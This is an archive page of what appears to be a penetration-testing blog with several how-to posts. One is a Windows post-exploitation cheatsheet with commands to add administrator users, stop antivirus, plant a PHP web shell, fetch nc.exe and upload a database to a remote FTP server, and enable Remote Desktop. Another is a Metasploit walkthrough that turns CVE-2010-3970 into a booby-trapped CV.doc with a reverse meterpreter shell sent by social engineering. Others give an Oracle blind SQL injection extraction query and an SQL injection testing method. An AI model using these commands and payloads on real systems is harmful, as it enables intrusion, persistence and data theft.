Archive for the How To Category

Manual pentesting cheatsheet (Windows)

Posted in How To, Penetration testing with tags , , , on June 5, 2012 by stormsecurity

This is a list of commands that can be useful when you have a shell on a Windows box and you want to do local discovery, escalate privileges and pivot (without using tools as Metasploit):

View your current user: whoami
View information about the current user: net user myuser(for a local user)
net user myuser /domain (for a domain user)
View the local groups: net localgroup
View the local administrators: net localgroup Administrators
Add a new user: net user myuser mypass /add
Add a user in the local Administrators group: net localgroup Administrators myuser /add
View the domain name of current machine: net config workstation
net config server
View the name of the domain controller: reg query "HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\ CurrentVersion\Group Policy\ History" /v DCName
View the list of domain admins: net group "Domain Admins" /domain
View the list of started services (search for antivirus): net start
sc query
Stop a service: net stop "Symantec Endpoint Protection"
View the list of started processes and the owner: tasklist /v
Kill a process by its name taskkill /F /IM "cmd.exe"
Abort a shutdown/restart countdown shutdown /a
Create php backdoor/shell echo ^<?php echo passthru($_GET['cmd']); ?^> > C:\inetpub\wwwroot\s.php
Download an executable from a remote FTP server echo open> C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo get nc.exe>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:script.txt
Upload a file to a remote FTP server echo open> C:\script.txt
echo user myftpuser>> C:\script.txt
echo pass myftppass>> C:\script.txt
echo put E:\backups\database.dbf>> C:\script.txt
echo bye>> C:\script.txt
ftp -s:script.txt
View established connections of current machine: netstat -a -n -p tcp | find "ESTAB"
View open ports of current machine: netstat -a -n -p tcp | find "LISTEN"
netstat -a -n -p udp
View network configuration: netsh interface ip show addresses
netsh interface ip show route
netsh interface ip show neighbors
View current network shares: net share
Mount a remote share with the rights of the current user: net use K: \\\C$
dir K:
Enable Remote Desktop: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


A¬†friend pointed me to a more comprehensive list of Windows commands that can be utilized for post-exploitation here. Thanks, Cosmin! ūüėČ


From Windows thumbnails vulnerability to remote shell

Posted in How To, Penetration testing with tags , , , , , on January 9, 2011 by stormsecurity

Beware of thubnails!

CVE-2010-3970 – Windows Graphics Rendering Engine vulnerability – is still a 0-day (9 January 2011) and the exploit is public.

Exploitation is pretty easy.The victim just needs to view a file like CV.doc in Windows Explorer – thumbnails mode – and the payload gets executed on a fully patched Windows XP SP3 machine.

This thumbnail (CV.doc)executes the Windows calculator:

Exploit thumbnail vulnerability

Exploiting the thumbnail vulnerability CVE-2010-3970

Things can get more serious when the attacker is able to open a meterpreter session with the victim’s machine. This can also be easily accomplished with Metasploit:

1. Creating the malicious thumbnail in msfconsole:

msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection
> show options
> set FILENAME CV.doc
> set OUTPUTPATH /root
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST
> set LPORT 80
> exploit

2. Sending the thumbnail to the victim (e.g. by social engineering attack).

3. Listening for incoming connections on the attacker machine:

msf > use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST
> set LPORT 80
> exploit

Et voila! The shell we were waiting for…

Meterpreter session

Meterpreter session open

Until a patch will be provided, Microsoft clients can use the Fix it tool described in this support page.

GROUP_CONCAT() for Oracle blind SQL injection

Posted in How To on January 13, 2010 by stormsecurity

GROUP_CONCAT() is a MySQL function that returns a string formed by concatenating multiple rows of a table.

This function is very useful in blind SQL injection attacks where you often need to extract multiple rows from a table in a single query. Then you will probably obtain this data through an out-of-band channel.

Unfortunately, Oracle does not have such a function. So what do you do if you need to extract multiple rows in a single query?

After a few hours of searching I have found a solution that works:

Assuming you have a table called mytable which has a column called mycolumn, you can obtain a concatenation of all the values from mycolumn by using this query:

SELECT LTRIM(MAX(SYS_CONNECT_BY_PATH(mycolumn,',')) KEEP (DENSE_RANK LAST ORDER BY curr),',') AS xyz FROM (SELECT mycolumn, rownum AS curr, rownum -1 AS prev FROM mytable WHERE mycolumn <= 'C02BC00555') CONNECT BY prev = PRIOR curr START WITH curr = 1

This worked for me in Oracle 10g but I'm pretty sure it works for other versions too.


Procedural SQL injection

Posted in How To with tags , , , , on October 15, 2008 by stormsecurity

How do you perform a complete SQL injection test on a web site?

As a penetration tester, I often had to test the security of various sites. One of the problems I have seen during those tests was that the results given by me were not 100% complete. I succeeded in finding many SQL injection bugs but sometimes not all of them. So I have developed a methodology that can be used to do thorough SQL injection tests.

My opinion is that automatic tools cannot find all SQL injection bugs, but only the superficial ones. Their results must be completed by manual tests that exploit the logic of the application and the flow of data within the application.

During the tests I use Paros as the automatic helper tool. It is a very good local web proxy that has MITM, spider and scanner capabilities. The steps to do an SQL injection test are:

  1. Start Paros and configure your web browser to use it as a proxy (localhost:8080). From now on, every request made by your browser will pass through Paros and you will be able to see it, resend it or modify it (including the “hidden” requests).
  2. The testing architecture looks like this:
  3. Start browsing manually the targeted website
    • Find as many forms as you can and submit them with random data
    • You can use the Site Map (if it exists) to identify the interactive pages (ex. Search, Contact, Feedback, Ask a question) and submit data
    • All the requests that you do will be memorized by Paros
  4. Use the Spider utility from Paros to do an automatic crawling in order to find as many pages as it can from that web site
    • Step 2 is necessary because Paros does not always find all the site pages and because it uses the pages already discovered to crawl them too
  5. Do an SQL injection scan with Paros
    • Chance the Scan Policy to include only SQL injection and SQL injection fingerprinting
    • Start the Scan
    • Paros will try to¬†call all the dynamic pages that it has already found¬†with parameters according to the Scan Policy
  6. Now comes the part that requires true skills
    • Analyse the alerts found by Paros
    • See what¬†are the pages and¬†parameters that allow injection
    • Reproduce manually the injection
    • Try to exploit the bug and find real information¬†from the backed database
    • Categorize the vulnerability based on its impact (what can you do with it)
      • HIGH – allows extraction of information from the database (in band or out of band)
      • MEDIUM – allows the attacker to see¬†application error messages but it is not obvious how it can be used to extract information from the database
      • LOW – produces an application dis-functionality but it does not give any error messages nor can be used to extract information from the database
  7. In order to find other SQL injection bugs, you must understand the logic of the application and try to “reverse-engineer” it. Think about how the programmer wrote the application and identify the vulnerable points.
  8. Write a detailed report on the vulnerabilities found and the ways they can be exploited in order to affect the information from the database and the functionality of the website.

I also found very useful some SQL injection cheat sheets for different databases like this and this.